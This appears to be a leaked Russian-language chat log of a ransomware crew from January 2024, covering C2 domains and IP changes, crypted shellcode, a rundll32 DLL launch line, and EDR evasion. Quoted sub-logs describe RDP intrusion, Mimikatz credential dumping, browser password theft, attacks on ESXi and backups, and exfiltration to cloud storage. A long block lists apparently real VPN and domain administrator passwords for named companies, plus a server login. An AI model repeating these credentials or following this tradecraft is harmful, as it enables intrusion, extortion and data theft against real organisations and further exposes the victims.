[2024-01-25 17:48:59] @sunortla:matrix.bestflowers247.online: Он мне говорил, что он оценивает свои услуги в 2к
--------------------
[2024-01-25 17:49:09] @sunortla:matrix.bestflowers247.online: С клиента
--------------------
[2024-01-25 17:49:43] @sunortla:matrix.bestflowers247.online: Он поехал из-за денег
--------------------
[2024-01-25 17:49:59] @sunortla:matrix.bestflowers247.online: Амбиции появились и тд
--------------------
[2024-01-25 17:51:18] @sunortla:matrix.bestflowers247.online: Ты так легко к этому относишься
--------------------
[2024-01-25 17:51:27] @sunortla:matrix.bestflowers247.online: Он тебе тоже мину подложил?
--------------------
[2024-01-25 17:52:41] @usernamegg:matrix.bestflowers247.online: ++
--------------------
[2024-01-25 17:52:51] @sunortla:matrix.bestflowers247.online: О как?
--------------------
[2024-01-25 17:53:01] @sunortla:matrix.bestflowers247.online: Что он такого сделал?
--------------------
[2024-01-25 17:58:58] @usernamegg:matrix.bestflowers247.online: пару таргетов мне своим криптом заруинили
--------------------
[2024-01-25 17:59:53] @sunortla:matrix.bestflowers247.online: Какой тип файлов?
--------------------
[2024-01-25 18:00:51] @sunortla:matrix.bestflowers247.online: Как понять заруинили, файл сломался?
--------------------
[2024-01-25 18:02:58] @lapa:matrix.bestflowers247.online: на италию я хотел прослать, чтобы понять как будут html
--------------------
[2024-01-25 18:03:33] @lapa:matrix.bestflowers247.online: * на италию я хотел прослать, чтобы понять как будут html с павершеллом запускать
--------------------
[2024-01-25 18:03:46] @lapa:matrix.bestflowers247.online: а если этот чел соберет js
--------------------
[2024-01-25 18:03:56] @lapa:matrix.bestflowers247.online: тогда нужно что-то годное ставить на выдачу, а не путти
--------------------
[2024-01-25 18:04:30] @lapa:matrix.bestflowers247.online: бизнесс акк на атулке пытаются ребята сделать?
--------------------
[2024-01-25 18:04:39] @lapa:matrix.bestflowers247.online: у меня просто смс код не приходил нифига
--------------------
[2024-01-25 18:05:24] @usernamegg:matrix.bestflowers247.online: шеллкод х64
--------------------
[2024-01-25 18:05:36] @usernamegg:matrix.bestflowers247.online: фаил спалился и на сетке начался выпил
--------------------
[2024-01-25 18:05:39] @usernamegg:matrix.bestflowers247.online: админы прилетели
--------------------
[2024-01-25 18:05:56] @usernamegg:matrix.bestflowers247.online: да
--------------------
[2024-01-25 18:05:59] @usernamegg:matrix.bestflowers247.online: у нас же есть ехе
--------------------
[2024-01-25 18:06:05] @usernamegg:matrix.bestflowers247.online: квака
--------------------
[2024-01-25 18:06:33] @lapa:matrix.bestflowers247.online: ну квака мы же точечно только можем слать
--------------------
[2024-01-25 18:06:53] @lapa:matrix.bestflowers247.online: тогда точечно и прошлем завтра js
--------------------
[2024-01-25 18:07:34] @lapa:matrix.bestflowers247.online: на RR
--------------------
[2024-01-25 18:09:06] @usernamegg:matrix.bestflowers247.online: хорошо
--------------------
[2024-01-25 18:11:30] @usernamegg:matrix.bestflowers247.online: 
https://check-host.net/check-tcp?host=greenmotors.top%3A80&csrf_token=dad1af05ecd277a542fe4963808e9ccfc16e700b

https://check-host.net/check-tcp?host=stuffstevenpeters.top:80&csrf_token=dad1af05ecd277a542fe4963808e9ccfc16e700b

оба домена работают. по крайней мере с моей стороны)
--------------------
[2024-01-25 18:16:40] @usernameyy:matrix.bestflowers247.online: 95.217.40.220 поменяй на 65.108.98.161
--------------------
[2024-01-25 18:17:06] @usernamegg:matrix.bestflowers247.online: чего ??
--------------------
[2024-01-25 18:17:23] @usernameyy:matrix.bestflowers247.online: айпишник поменяй у домена greenmotors.top
--------------------
[2024-01-25 18:17:24] @usernamegg:matrix.bestflowers247.online: так это не работает
--------------------
[2024-01-25 18:17:26] @usernamegg:matrix.bestflowers247.online: там панель
--------------------
[2024-01-25 18:17:54] @usernameyy:matrix.bestflowers247.online: ты же менял айпишники раньше
--------------------
[2024-01-25 18:18:59] @sunortla:matrix.bestflowers247.online: Это когда было?
--------------------
[2024-01-25 18:19:48] @sunortla:matrix.bestflowers247.online: Shellcode x64 --> exe?
--------------------
[2024-01-25 18:22:12] @usernameyy:matrix.bestflowers247.online: 178.236.246.147 = stuffstevenpeters.top этот в блоге обновил
greenmotors.top этот обновил, после смены айпи заработает

--------------------
[2024-01-25 18:28:53] @lapa:matrix.bestflowers247.online: офнусь. завтра уже утром заберу файлы
--------------------
[2024-01-25 18:31:15] @usernamegg:matrix.bestflowers247.online: прау недель назад
--------------------
[2024-01-25 18:33:49] @usernamegg:matrix.bestflowers247.online: ++
--------------------
[2024-01-25 18:37:09] @burito:matrix.bestflowers247.online: > <@usernamezz:matrix.bestflowers247.online> 1_443

rundll32.exe dll.dll,OleInitStack
--------------------
[2024-01-25 18:37:09] @burito:matrix.bestflowers247.online: signed_B47BA7CAA.7z
--------------------
[2024-01-25 18:44:09] @usernamegg:matrix.bestflowers247.online: [21:43:55] LORD1 - Cob Meta: > https://scanner.to/result/6fQ3V2At4Ecn
And runtime also
--------------------
[2024-01-25 18:45:29] @usernamenn:matrix.bestflowers247.online: check this on EDR scanner
--------------------
[2024-01-25 18:45:43] @burito:matrix.bestflowers247.online: > <@usernamezz:matrix.bestflowers247.online> DE_443x64_thread.bin

rundll32.exe dll.dll,OleInitStack
--------------------
[2024-01-25 18:45:43] @burito:matrix.bestflowers247.online: signed_B87C7CCCD6.7z
--------------------
[2024-01-25 18:55:42] @usernamegg:matrix.bestflowers247.online: почему ты сразу не сказал верный ip ?
--------------------
[2024-01-25 18:55:48] @usernamegg:matrix.bestflowers247.online: сейчас там. целая система
--------------------
[2024-01-25 18:56:04] @usernameyy:matrix.bestflowers247.online: забыл что поменялся сервер
--------------------
[2024-01-25 18:57:36] @usernamegg:matrix.bestflowers247.online: > <@usernameyy:matrix.bestflowers247.online> 95.217.40.220 поменяй на 65.108.98.161

65.108.98.161 я не могу поменять
--------------------
[2024-01-25 18:57:43] @usernamegg:matrix.bestflowers247.online: мне надо заказывать новый акк
--------------------
[2024-01-25 18:57:46] @usernamegg:matrix.bestflowers247.online: это время
--------------------
[2024-01-25 18:57:52] @usernamegg:matrix.bestflowers247.online: 65.108.98.161 под этот ip
--------------------
[2024-01-25 18:57:56] @usernamegg:matrix.bestflowers247.online: что бы домен привязать туда
--------------------
[2024-01-25 18:58:10] @usernamegg:matrix.bestflowers247.online: 95.217.40.220 этот больше нам не нужен ?
--------------------
[2024-01-25 18:58:20] @usernameyy:matrix.bestflowers247.online: его у нас забрали
--------------------
[2024-01-25 18:58:26] @usernameyy:matrix.bestflowers247.online: потому что он не проплачен был
--------------------
[2024-01-25 18:58:51] @usernamegg:matrix.bestflowers247.online: да да я понял
--------------------
[2024-01-25 18:58:56] @usernamegg:matrix.bestflowers247.online: я тогда отменяю тот акк
--------------------
[2024-01-25 18:59:00] @usernamegg:matrix.bestflowers247.online: новый сейчас запрошу
--------------------
[2024-01-25 18:59:05] @usernamegg:matrix.bestflowers247.online: он поменять не может там ip
--------------------
[2024-01-25 18:59:14] @usernameyy:matrix.bestflowers247.online: ну ладно
--------------------
[2024-01-25 19:00:14] @usernamegg:matrix.bestflowers247.online: ```
[21:54:29] adm: привет
[21:54:37] adm: вообще не юзаем кобу
[21:54:41] AA: приветушки
[21:54:44] AA: да я уже разобрался
[21:54:52] AA: а что же ты юзаешь ?
[21:55:01] adm: тупо по РДП
[21:55:05] adm: все изучаем
[21:55:23] adm: кобу некому чистить
[21:55:33] adm: поэтому ее вообще ща не используем
[21:55:43] adm: качаем ИТ дату
[21:55:53] adm: и дальше уже думаем что и где
[21:56:16] adm: перед локом, уже пробуем доступы, т.к. 2фа может быть
[21:56:21] adm: а там уже как пойдет
[21:56:42] adm: собираем профили и пассы со всех браузерах
[21:56:51] adm: в том числе админов
[21:57:03] adm: дальше решаем что есть, и прикидываем
[21:57:08] adm: что можно сделать
[21:58:51] adm: в основном, доступы в exsi всегда получаем, проблема в бекапых
[21:58:57] adm: бекапах
[21:59:34] adm: бывает получили, но они както откатываются,  либо лента, либо облако офф какой нибудь
[21:59:36] adm: было не раз
```
--------------------
[2024-01-25 19:02:20] @usernamegg:matrix.bestflowers247.online: 1-2.rar
--------------------
[2024-01-25 19:02:22] @usernamegg:matrix.bestflowers247.online: F57RCFT57F56RKF67
--------------------
[2024-01-25 19:04:32] @usernamegg:matrix.bestflowers247.online: > <@usernamegg:matrix.bestflowers247.online> https://kitronits.com/4P6Hw2Q/{random}
> https://unitedtechform.com/Eaql/{random}
> https://trentform.com/pJx/{random}

с этими сделал он
--------------------
[2024-01-25 19:07:32] @usernamegg:matrix.bestflowers247.online: ```
Готово Full английская, проверь пожалуйста.


45.81.225.79
administrator
888Vdska000888Vpos


можно по этому подключаться вне впна
95.216.224.244
логин пароль те же.
```
--------------------
[2024-01-25 19:07:47] @usernameyy:matrix.bestflowers247.online: спасибо
--------------------
[2024-01-25 19:08:46] @usernamegg:matrix.bestflowers247.online: ++
--------------------
[2024-01-25 19:29:17] @usernamenn:matrix.bestflowers247.online: image.png
--------------------
[2024-01-25 19:29:47] @usernamegg:matrix.bestflowers247.online: 65.108.98.161 - проверяй
--------------------
[2024-01-25 19:29:52] @usernamegg:matrix.bestflowers247.online: скоро заработает
--------------------
[2024-01-25 19:30:01] @usernameyy:matrix.bestflowers247.online: домен то новый?
--------------------
[2024-01-25 19:30:02] @usernamegg:matrix.bestflowers247.online: greenmotors.top
--------------------
[2024-01-25 19:36:12] @usernamegg:matrix.bestflowers247.online: ```
[21:54:29] adm: привет
[21:54:37] adm: вообще не юзаем кобу
[21:54:41] AA: приветушки
[21:54:44] AA: да я уже разобрался
[21:54:52] AA: а что же ты юзаешь ?
[21:55:01] adm: тупо по РДП
[21:55:05] adm: все изучаем
[21:55:23] adm: кобу некому чистить
[21:55:33] adm: поэтому ее вообще ща не используем
[21:55:43] adm: качаем ИТ дату
[21:55:53] adm: и дальше уже думаем что и где
[21:56:16] adm: перед локом, уже пробуем доступы, т.к. 2фа может быть
[21:56:21] adm: а там уже как пойдет
[21:56:42] adm: собираем профили и пассы со всех браузерах
[21:56:51] adm: в том числе админов
[21:57:03] adm: дальше решаем что есть, и прикидываем
[21:57:08] adm: что можно сделать
[21:58:51] adm: в основном, доступы в exsi всегда получаем, проблема в бекапых
[21:58:57] adm: бекапах
[21:59:34] adm: бывает получили, но они както откатываются,  либо лента, либо облако офф какой нибудь
[21:59:36] adm: было не раз
[22:30:53] adm: вот те кого въебали последними, это онлайн площадка была, они взвыли
[22:31:06] adm: т.к. 2фа не было на облако S3
[22:31:16] adm: я там все ебнул им
[22:31:39] AA: ++
[22:31:39] adm: и получили доступ к виим
[22:31:43] AA: отлично
[22:31:51] AA: долго анализировал все ?
[22:32:03] adm: 1-2 недели
[22:32:03] AA: на админскую тачку попал ?
[22:32:10] AA: как креды собираешь ?
[22:32:17] adm: на всех тачках там были
[22:32:27] adm: креды через мимик
[22:32:29] adm: локально
[22:32:46] adm: ищем хосты где нет АВ
[22:32:55] adm: полный скан сети многое решает
[22:33:16] adm: а так в этой сети мы были 2 года примерно)
[22:33:26] adm: успели даже СС собрать с них
[22:33:27] AA: ну а как ты определяешь что на тачке нету ав ?
[22:33:38] adm: тасклист
[22:33:53] AA: ты каждую тачку руками чекаешь и смотришь процессы ?
[22:33:57] adm: да
[22:34:06] adm: время вагон это занимает
[22:34:09] AA: а если сеть несколько кк и это только один траст ?
[22:34:21] adm: да вот
[22:34:28] adm: тут уже от конкретики
[22:34:32] adm: что за Ав
[22:34:34] adm: итд
[22:34:41] adm: ща вот корп у нас
[22:34:55] adm: мы не пробились в основной домен
[22:35:02] adm: там фалкон
[22:35:08] adm: выкидывает и все
[22:35:21] adm: но даты накачали уже 4 ТБ
[22:35:27] adm: все базы их
[22:35:36] adm: и пока не лезем туда
```
--------------------
[2024-01-25 19:50:21] @usernamegg:matrix.bestflowers247.online: ```
[22:47:53] adm: а куда ты льешь дату ?
[22:48:09] AA: в смысле ?
[22:48:16] adm: на какой хост ?
[22:48:28] AA: беру сервер максиьмально близкий к локации где таргет
[22:48:33] AA: разные
[22:48:36] adm: нет
[22:48:42] adm: бери облако
[22:48:53] adm: в ЕУ US

[22:49:05] adm: ploud.com
[22:49:20] adm: и туда лей
[22:49:34] adm: только не говори ни кому ))
[22:49:46] adm: мы туда лили одного хуя
[22:49:58] adm: он там шухер навел
```
--------------------
[2024-01-25 19:50:39] @usernamegg:matrix.bestflowers247.online: pcloud.com
--------------------
[2024-01-25 19:51:02] @usernamegg:matrix.bestflowers247.online: заработал ?
--------------------
[2024-01-25 19:51:05] @usernamegg:matrix.bestflowers247.online: Снимок экрана 2024-01-25 в 22.50.51.png
--------------------
[2024-01-25 19:51:18] @usernameyy:matrix.bestflowers247.online: пока нет
--------------------
[2024-01-25 19:51:36] @usernamenn:matrix.bestflowers247.online: https://blog.malicious.group/writing-your-own-rdi-srdi-loader-using-c-and-asm/
--------------------
[2024-01-25 19:51:37] @usernamegg:matrix.bestflowers247.online: [22:50:17] adm: pcloud.com
[22:50:20] adm: вот
[22:50:32] AA: хорошо
[22:50:38] AA: попробую
[22:50:59] adm: они раньше крипту принимали
[22:51:03] adm: щас уже нет
[22:51:12] adm: на карту делай акк
[22:51:19] adm: и сразу себе сливай дату
--------------------
[2024-01-25 19:53:03] @usernamegg:matrix.bestflowers247.online: https://blog.malicious.group/writing-your-own-rdi-srdi-loader-using-c-and-asm/
--------------------
[2024-01-25 19:53:11] @usernamenn:matrix.bestflowers247.online: image.png
--------------------
[2024-01-25 19:53:26] @usernamegg:matrix.bestflowers247.online: да и с ертами какая то пизда
--------------------
[2024-01-25 19:57:54] @usernamegg:matrix.bestflowers247.online: ```
[16:35:43] miracleworkers: Quantum
[16:35:47] miracleworkers: Там все по другому было
[16:35:51] miracleworkers: Столько мату нам вьебали бро
[16:36:39] miracleworkers: 150kk$
vpn.johare.com\exadmin 236admin
johare.com\dladmin:Idont4
johare.com\MCSadmin:M@rch2017
johare.com\tbadminjr:Snow21!
johare.com\Administrator:Willdo
johare.com\tbadmin:Voice78!
johare.com\rdadmin:People102610
[16:36:45] miracleworkers: $300 Million City Brewing Company is a contract beverage producer.
vpn.citybrewery.com rhughes Emily1Andrea
citybrewery.com\Administrator:Dr1nk$4u
citybrewery.com\batchuser:$1mpl32009
citybrewery.com\OfficeAutomationUser:city2001
citybrewery.com\admin:city2001
citybrewery.com\qaadmin:City1234
citybrewery.com\StartServiceAdmin:friday13
citybrewery.com\vadmin:$3cur1ty
citybrewery.com\exchangeadmin:p0$t0ff!c3
citybrewery.com\sharepointsearch:t3@mw0Rk
citybrewery.com\jsadmin:MyAdmin01
citybrewery.com\mailmgmt:M@1lb0x1
citybrewery.com\HJS:HJSPASS
citybrewery.com\hjsadmin:HJSPASS
citybrewery.com\cbcadmin:syst3ms
citybrewery.com\Sharepointadmin:t3@mw0Rk
citybrewery.com\iasadmin:Ia$admin1
citybrewery.com\AdpAdmin:Adp99988
citybrewery.com\asadmin:Spring2022
citybrewery.com\wbadmin:Zaskar14
citybrewery.com\bbadmin:Jeter#212
citybrewery.com\jbadmin:Twiztid&8
citybrewery.com\thoradmin:Th0rpass1
citybrewery.com\sptimer:t3@mw0Rk
citybrewery.com\bjadmin:Etta2015
citybrewery.com\farmbackup:Sh@rePo1nt
citybrewery.com\chadmin:M@disen165
citybrewery.com\ntadmin:H0tdeals1.
citybrewery.com\CNAdmin:Temp4Alex
citybrewery.com\anhadmin:Memphis1!
citybrewery.com\mwadmin:snapSh0t
citybrewery.com\tsadmin:Bgold11!
citybrewery.com\dsadmin:Asheris007
citybrewery.com\joshladmin:Spring2022
citybrewery.com\abadmin:Crazyman21!

[16:36:45] miracleworkers: citybrewery.com\jphoadmin:H3llyeah1
[16:36:52] miracleworkers: $69 Million IN vpn.hertshtengroup.com naman.tambi Cellopctissue@22
hertshtengroup.com\nick.eaton:Football123456??

Revenue: $105 Million
L.W. Buddy Ledwell and his father, Lloy Ward Ledwell, established Ledwell & Son Lumber in Texarkana, Texas in 1946. Ledwell products include custom manufacturedRead More
vpn.ledwell.com kcecil kingfish63
ledwell.com\tadmin:password99
ledwell.com\test:Waco12345
ledwell.com\adfsuser:Pass_Word00!
ledwell.com\jgreger:053088
[16:36:58] miracleworkers: Revenue: $251 Million
DGI Supply is a DoALL Company who focus on distributing industrial supplies and providing integrated supply solutions including commodity management programs.
Phone Number:(847) 495-6800
vpn.dgisupply.com Tierpoint ert345ERT#$%
doall.com\SQLAdmin:j42x17bg

Revenue:$210 Million
Founded in 1960, Liftow is a Toyota forklift dealer group in North America. They offer new and pre-owned inventory of forklifts as well as parts and services, rRead More
Phone Number:(905) 677-3270
vpn.liftow.com traci.sheals kingofthenorth1
ADSyncUser:MapleLeaf5
[16:37:08] miracleworkers: Founded in 1947, Flambeau specializes in designing injection and blow-molded thermoplastic components and products, building tools/tooling and fixtures, and con
801 Lynn Ave, Baraboo, Wisconsin, 53913, United States
Phone Number:(608) 356-5551
Website:www.flambeau.com
Revenue:$407 Million
vpn.flambeau.com ikon ikon2006
flambeau.com\vsc:Passw0rd
flambeau.com\klichman:F1amb3au
flambeau.com\dwallace:Dragonsole57
flambeau.com\ikon:ikon2006
flambeau.com\rpt_mgr:b0bsagget
flambeau.com\ukiqms02:Flam2015
flambeau.com\sadams:th3l3g3nd0fz3ld4
flambeau.com\heisen:B0jack_3
flambeau.com\kremus:$m3llycat$
flambeau.com\commvault:Fl0und3rs!
flambeau.com\adsi:KitKat1993!
flambeau.com\c_edi:st3r1ing

[16:37:24] miracleworkers: rev 800kk
vpn.costagroup.com.au shaslam Holden12
costagroup.com.au\Administrator:V3g3m1te
costas.local\servicedesk_dev:Alt1r1s!

170kk
ssl.peavey.com
ssl.peavey.com Gwen.Blakely peavey
peavey.net\incare_sjones:asdflkj_1
peavey.net\joshua.lummus:peavey
peavey.net\agraves:peavey
peavey.net\sysadd:ddasys
peavey.net\dll11415:fuckyou
peavey.net\dustin.ezell:peavey124
[16:37:49] miracleworkers: vpn.midcogen.com KLGledhill barkley1
mcv.com\ladevito-da:Th!s!snotmyn@m3
midcogen.com\mmmahoney:Password01!
midcogen.com\netarx:n3t@rx
вот на этом заводе вскрылось
[16:38:02] miracleworkers: Все  с ДА отдавал (
[16:38:16] miracleworkers: заработал тсолько что не хватает бабок сплойто обновить (((
[16:38:20] miracleworkers: сидим не знаем как быть
```
--------------------
[2024-01-25 20:09:47] @usernameyy:matrix.bestflowers247.online: всё работает
--------------------
[2024-01-25 20:13:24] @usernamegg:matrix.bestflowers247.online: я++
--------------------
[2024-01-25 20:26:43] @usernamegg:matrix.bestflowers247.online: O5WGZXZT7IQ
--------------------
[2024-01-25 20:26:55] @usernamegg:matrix.bestflowers247.online: TIQIYLA9TW5M
--------------------
[2024-01-25 21:29:54] @usernamegg:matrix.bestflowers247.online: https://privnote.com/AmZVrQ3a#xXL89Ao7o
--------------------
[2024-01-25 21:43:02] @usernamegg:matrix.bestflowers247.online: https://youtu.be/ygbUJrF1ul4?si=OJcWabeny2IEqAIB
--------------------
